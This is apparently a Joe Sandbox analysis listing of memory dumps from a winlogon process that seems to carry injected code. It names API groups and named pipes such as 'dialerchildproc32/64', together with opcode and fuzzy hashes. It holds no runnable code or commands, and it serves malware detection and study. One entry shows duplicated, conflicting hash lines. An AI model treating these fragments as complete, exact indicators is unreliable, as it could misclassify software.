• Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
APIs
• GetLastError.KERNEL32 ref: 000001E85898CE37
• FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
• FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
• FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
• FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
• FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
• SetLastError.KERNEL32 ref: 000001E85898CED7
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
• FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
  • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
  • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
  • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
• Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
• Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
• Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
APIs
• FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
• FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
• FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
• FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
• FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
• Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750
